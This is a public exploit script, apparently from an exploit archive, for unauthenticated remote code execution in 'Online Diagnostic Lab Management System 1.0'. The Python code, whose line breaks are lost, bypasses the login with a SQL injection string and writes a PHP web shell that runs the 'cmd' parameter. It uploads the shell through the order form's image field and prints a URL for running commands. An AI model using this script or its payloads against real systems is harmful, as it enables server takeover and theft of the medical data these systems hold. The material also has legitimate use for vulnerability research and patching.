Online Diagnostic Lab Management System 1.0 SQL Injection / Shell Upload

# Exploit Title: Online Diagnostic Lab Management System - Remote Code Execution (RCE) (Unauthenticated)# Google Dork: N/A# Date: 2022-9-23# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/diagnostic_0.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0# Authentication Required: bypass login with sql injection #/usr/bin/python3 import requests import osimport sysimport timeimport random# clean screenos.system("cls")os.system("clear")logo = '''###################################################################                                                                #  #    Exploit Script ( Online Diagnostic Lab Management System )  ##                                                                ###################################################################'''print(logo)url = str(input("Enter website url : "))username = ("' OR 1=1-- -")password = ("test")req = requests.Session()target = url+"/diagnostic/login.php"data = {'username':username,'password':password}website = req.post(target,data=data)files = open("rev.php","w")payload = "<?php system($_GET['cmd']);?>"files.write(payload)files.close()hash = random.getrandbits(128)name_file = str(hash)+".php"if "Login Successfully" in website.text:        print("[+] Login Successfully")    website_1 = url+"/diagnostic/php_action/createOrder.php"    upload_file = {         "orderDate": (None,""),        "clientName": (None,""),        "clientContact" : (None,""),        "productName[]" : (None,""),        "rateValue[]" : (None,""),        "quantity[]" : (None,""),        "totalValue[]" : (None,""),        "subTotalValue" : (None,""),        "totalAmountValue" : (None,""),        "discount" : (None,""),        "grandTotalValue" : (None,""),        "gstn" : (None,""),        "vatValue" : (None,""),        "paid" : (None,""),        "dueValue" : (None,""),        "paymentType" : (None,""),        "paymentStatus" : (None,""),        "paymentPlace" : (None,""),        "productImage" : (name_file,open("rev.php","rb"))        }     up = req.post(website_1,files=upload_file)    print("[+] Check here file shell => "+url+"/diagnostic/assets/myimages/"+name_file)    print("[+] can exect command here => "+url+"/diagnostic/assets/myimages/"+name_file+"?cmd=whoami")else:     print("[-] Check username or password")